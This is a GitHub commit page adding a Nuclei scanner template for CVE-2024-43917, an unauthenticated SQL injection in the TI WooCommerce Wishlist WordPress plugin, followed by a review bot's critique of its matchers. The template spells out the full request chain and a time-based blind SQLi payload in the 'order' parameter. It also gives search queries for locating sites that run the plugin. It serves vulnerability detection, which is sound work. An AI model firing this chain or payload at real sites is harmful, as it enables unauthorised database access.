Create CVE-2024-43917.yaml

patch-12
Dhiyaneshwaran 2024-10-01 02:37:17 +05:30 committed by GitHub
parent 096f4b31a1
commit 56aa28afa4
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 130 additions and 0 deletions


@ -0,0 +1,130 @@
id: CVE-2024-43917
info:
name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.
reference:
- https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
- https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-43917
cwe-id: CWE-89
epss-score: 0.00091
epss-percentile: 0.39641
cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
tags: cve,cve2024,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli,intrusive
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- '"nonce":"([a-z0-9]+)"'
- raw:
- |
GET /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: product_id
group: 1
regex:
- 'data-tinvwl_product_id="([0-9]+)"'
matchers:
- type: word
part: body
words:
- 'data-tinvwl_product_id="'
internal: true
- raw:
- |
POST /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="form[tinvwl-hidden-fields]"
[]
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_id"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_name"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_type"
simple
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_id"
{{product_id}}
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_variation"
0
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_action"
addto
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="redirect"
{{RootURL}}/product-category/uncategorized/
------WebKitFormBoundaryNfcbSwJQX8ALWCMG--
extractors:
- type: json
name: share_key
internal: true
json:
- '.wishlist.share_key'
part: body
- raw:
- |
GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(5)))a)--+- HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "duration>=5"
- "contains(content_type, 'application/json')"
- "contains(body, 'product_id')"
condition: and
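Review bot: The final DSL matcher rests on `duration>=5` alone, because the other two conditions (`application/json` content type and `product_id` in the body) would presumably also hold for an ordinary wishlist response from a fixed install, so a slow host can be reported as a critical finding. I would add a comment above that block, for example `# timing-only signal: the content-type/body checks do not separate patched from vulnerable; confirm by re-running before triage`, and tighten it with a status condition if the endpoint's success code is known. Requests 2 and 3 hard-code `/product-category/uncategorized/`, and with the `&&` flow a shop that lacks that category yields no result even when the plugin is vulnerable; a short comment next to `flow:` should state this coverage limit. The `info` block also has no `remediation:` field and the description still calls the issue unpatched, so whoever reads the scan output gets no next step.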